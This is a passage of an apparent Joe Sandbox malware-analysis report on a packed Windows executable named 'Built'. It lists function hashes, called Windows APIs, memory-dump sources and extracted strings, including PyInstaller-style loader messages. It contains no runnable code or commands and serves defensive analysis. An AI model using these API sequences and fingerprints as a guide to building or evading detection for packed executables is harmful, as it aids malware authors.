                                                                      • Instruction ID: 9cff1fb3f28cf8c607123fc15b8aa714c2fcc2252f47b8482538f1ed007ec7b7
                                                                      • Opcode Fuzzy Hash: dfa8aec1510d3dd9a5f7309a3e3d747647d746a0efbc19ea33d4be1b9a8d2319
                                                                      • Instruction Fuzzy Hash: FB51A267F08B8181E7608F1AA850BE967A4EB94BC4F45A139DE9C43BD9DF3CD598C700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2063693974.00007FFDF7211000.00000040.00000001.01000000.0000001A.sdmp, Offset: 00007FFDF7210000, based on PE: true
                                                                      • Associated: 00000003.00000002.2063642095.00007FFDF7210000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF721D000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7275000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7289000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7299000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF72AD000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF745E000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7460000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF748B000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF74BD000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF74E2000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7530000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7536000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7538000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7555000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2063693974.00007FFDF7562000.00000040.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065078248.00007FFDF7566000.00000080.00000001.01000000.0000001A.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2065120832.00007FFDF7568000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7210000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: 00007$A1370$B5630
                                                                      • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                      • API String ID: 751195488-1596076588
                                                                      • Opcode ID: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
                                                                      • Instruction ID: 848f22f73c0c5ab4b64a225c5f2c4ab4150745dda7252e49757606033aec3a26
                                                                      • Opcode Fuzzy Hash: cc7c6589514fd3f94b54c26a0afcf694c1ba4532192f104d776a5ebc2ee4bbca
                                                                      • Instruction Fuzzy Hash: 0C518B2AB18647E2EB14DB62E420EF96391BF44B84F440039ED6E43BD9DE7CE4058700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                      • String ID: P%$[oV116
                                                                      • API String ID: 2147705588-2705092927
                                                                      • Opcode ID: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                      • Instruction ID: 1ced1044051193052f11547bade4a54319b432d052b523778522b2f22fd7e498
                                                                      • Opcode Fuzzy Hash: 028f263e58f42d33d872b22938efc015f71aa7b4c996476cfe5add7d8b08dd36
                                                                      • Instruction Fuzzy Hash: 7C51E7266187A1C6D734AF26A4181BAF7A1F798B62F404135EFDE43A85EF3CD045CB20
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060889895.00007FFDF7031000.00000040.00000001.01000000.0000001E.sdmp, Offset: 00007FFDF7030000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060849267.00007FFDF7030000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7092000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70DE000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70E1000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF70E6000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7140000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7143000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7145000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060889895.00007FFDF7148000.00000040.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2061824511.00007FFDF7149000.00000080.00000001.01000000.0000001E.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2061898819.00007FFDF714B000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffdf7030000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 349153199-0
                                                                      • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                      • Instruction ID: f921ac35fecb85df2f33a8c88f6ea30845b8ea9558e8b40fcb00dbd922b559d9
                                                                      • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                      • Instruction Fuzzy Hash: CC819E2DF0864386F7F09B659461AF962B0AF46780F548439DA6CC73DEDE3CE9C5A600
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2067833752.00007FFE10241000.00000040.00000001.01000000.00000019.sdmp, Offset: 00007FFE10240000, based on PE: true
                                                                      • Associated: 00000003.00000002.2067786315.00007FFE10240000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE1025E000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2067833752.00007FFE10268000.00000040.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068013590.00007FFE1026B000.00000080.00000001.01000000.00000019.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2068045178.00007FFE1026D000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffe10240000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 349153199-0
                                                                      • Opcode ID: 3deb18bcaf08424228fc9faf223167da3c092cad5365cc421c38a22d5af63d85
                                                                      • Instruction ID: 690598a615ba7e18ce1dd3a3596537a7759d078549fc4927766240b5dc4e98e7
                                                                      • Opcode Fuzzy Hash: 3deb18bcaf08424228fc9faf223167da3c092cad5365cc421c38a22d5af63d85
                                                                      • Instruction Fuzzy Hash: 92818A21E18E43C6FA54AB6794812796E90AFC67B4F9440B5DF4CC77B7DE2CE849C600
                                                                      APIs
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • SetConsoleCtrlHandler.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C800A
                                                                      • GetStartupInfoW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C802B
                                                                        • Part of subcall function 00007FF76D5D978C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D97A0
                                                                        • Part of subcall function 00007FF76D5D7A2C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7A93
                                                                      • GetCommandLineW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C80CD
                                                                      • CreateProcessW.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C810F
                                                                      • WaitForSingleObject.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C8123
                                                                      • GetExitCodeProcess.KERNEL32(?,00007FF76D5C39C0), ref: 00007FF76D5C8133
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                      • String ID: CreateProcessW$Failed to create child process!$[oV116
                                                                      • API String ID: 2895956056-3201491172
                                                                      • Opcode ID: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                      • Instruction ID: 5c95ef3233acb4006b4c4665c0adfba61d3624a43145cedb2713642687650bb7
                                                                      • Opcode Fuzzy Hash: 2d8580ce5d81a01d0f8683f73fef31206a84e7faf833a053d17f215ed92b6c27
                                                                      • Instruction Fuzzy Hash: 7B410431A1C781C1DB20BB24F4552AAB3A1FB89364F900335E9AD47BD6EF7CD0458B60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: -$:$f$p$p
                                                                      • API String ID: 3215553584-2013873522
                                                                      • Opcode ID: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                      • Instruction ID: 3fb5e0500e17e72d1a32e5009aaa274686dde0c153129dd0a3a2b86acb615497
                                                                      • Opcode Fuzzy Hash: 6485ef080591767760fe67f9caec812fff4e1ba5c20858478bd9f0fbec74de2f
                                                                      • Instruction Fuzzy Hash: D4128461A2C243C6FB20BB15D064279E661FB52750FD44135DAAA46EC6FF3CE590CB38
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: f$f$p$p$f
                                                                      • API String ID: 3215553584-1325933183
                                                                      • Opcode ID: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                      • Instruction ID: 1b85cf809e91196545d0148d97ab6021bb633926a2feb0ae865539252f420907
                                                                      • Opcode Fuzzy Hash: 47a7a6303f50c331757a7ed503f6ccc132970c05c2223996d06c8e5714df85c4
                                                                      • Instruction Fuzzy Hash: 06128361E2C143C6FB20BA1AE0646B9E251FB80754FD44033DAA947DC6EF7DE4809B79
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: [oV116$csm$csm$csm
                                                                      • API String ID: 849930591-2412342726
                                                                      • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                      • Instruction ID: e0d039ff91a23e5512b84333114877244d3d57b5b4fedc486f6a8249595b7d54
                                                                      • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                                      • Instruction Fuzzy Hash: BED16032A2C741C6EB20AB6594413ADB7A0FB55798F500139EE4D97F96EF38E091CB60
                                                                      APIs
                                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,000001D5E2D86C68,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE19C
                                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF76D5DE3BA,?,?,000001D5E2D86C68,00007FF76D5DA063,?,?,?,00007FF76D5D9F5A,?,?,?,00007FF76D5D524E), ref: 00007FF76D5DE1A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeLibraryProc
                                                                      • String ID: [oV116$api-ms-$ext-ms-
                                                                      • API String ID: 3013587201-3775442462
                                                                      • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                      • Instruction ID: f2893d0b71bf94a64afa05ebb4aa7950cd02e9e61dca5ef5c7578f6153641722
                                                                      • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                                      • Instruction Fuzzy Hash: DC41C331B2D602C1FA16FB16A8106B5E292BF45BA0F894135DD6D97B86FE3CE405C234
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7CE4
                                                                      • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C7D2C
                                                                        • Part of subcall function 00007FF76D5C7E10: GetEnvironmentVariableW.KERNEL32(00007FF76D5C365F), ref: 00007FF76D5C7E47
                                                                        • Part of subcall function 00007FF76D5C7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF76D5C7E69
                                                                        • Part of subcall function 00007FF76D5D7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D7561
                                                                        • Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                                      • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$[oV116$_MEI%d
                                                                      • API String ID: 740614611-488076301
                                                                      • Opcode ID: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                      • Instruction ID: 7c0004b7c7c841ee3bd77a572f202ef4d75feee4cc4491f1e2f6653cabc14b15
                                                                      • Opcode Fuzzy Hash: 9cba264b996c54071923a246639d1af5409d9d1b2208d63368212f3f3054f6c1
                                                                      • Instruction Fuzzy Hash: 7C418011E2D642C1EA20BB6199652F99261AF997C0FC41036ED2D47F97FE3CE5058B70
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message
                                                                      • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                      • API String ID: 2030045667-3659356012
                                                                      • Opcode ID: 0271c9e8a591b78ab9b321a6b40da885492933660b8e0e1c956a9867e3bf8942
                                                                      • Instruction ID: 26a90a7a21aa1f065b8da1727ee743bf6e986799b3433e0c9bd60d09c9e32b59
                                                                      • Opcode Fuzzy Hash: 0271c9e8a591b78ab9b321a6b40da885492933660b8e0e1c956a9867e3bf8942
                                                                      • Instruction Fuzzy Hash: 14415C21B2C642C2EA20BB12E8409B6E2A1BB44BC4F844035DD5D47F97FE3CE4458B70
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID: [oV116
                                                                      • API String ID: 2506987500-247592185
                                                                      • Opcode ID: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
                                                                      • Instruction ID: cd5f792b410c71dcf3c5fdcf970c33abae0a6236f8d723b2d8bc63fc76eabc0f
                                                                      • Opcode Fuzzy Hash: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
                                                                      • Instruction Fuzzy Hash: 5A216D21A2C642C2FA64B325566597AE1425F587B0FD40634EC3E47EDBFE2CB4404738
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C821D
                                                                      • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C827A
                                                                        • Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8305
                                                                      • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8364
                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8375
                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C838A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                      • String ID: [oV116
                                                                      • API String ID: 3462794448-247592185
                                                                      • Opcode ID: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                      • Instruction ID: 3a52251cca8e3cb8f25608df04fce95e339491af82c9d27b9614f2b945e6b2aa
                                                                      • Opcode Fuzzy Hash: a6a3fb36dedf01dc407d01068d21ba79f730b9d247533213ec4f70efe0ab8627
                                                                      • Instruction Fuzzy Hash: 01418462A2D682C1EB30BB11A9002BAB794FF45BC4F845139DF5D57B86EE3CD501CB60
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: Message$ErrorFormatLast
                                                                      • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error$[oV116
                                                                      • API String ID: 3971115935-1929273706
                                                                      • Opcode ID: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                      • Instruction ID: dc1cf27e58306d8152ba49d9e342c357a3e727a90219720369369e1d754be31e
                                                                      • Opcode Fuzzy Hash: 7223b30dd23a30c2aa7faf0092ff60e4697deebee1b944f1837b883079aee3ab
                                                                      • Instruction Fuzzy Hash: 5321FF7262CB86C2E720BB10F4516DAB365FB88785F800136EE8D53E99EF7CD5468B50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.2060268262.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true
                                                                      • Associated: 00000003.00000002.2060211027.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060337220.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060405164.00007FF76D603000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.2060684633.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ff76d5c0000_Built.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: [oV116$[oV116$[oV116$[oV116$[oV116
                                                                      • API String ID: 3215553584-4059291977
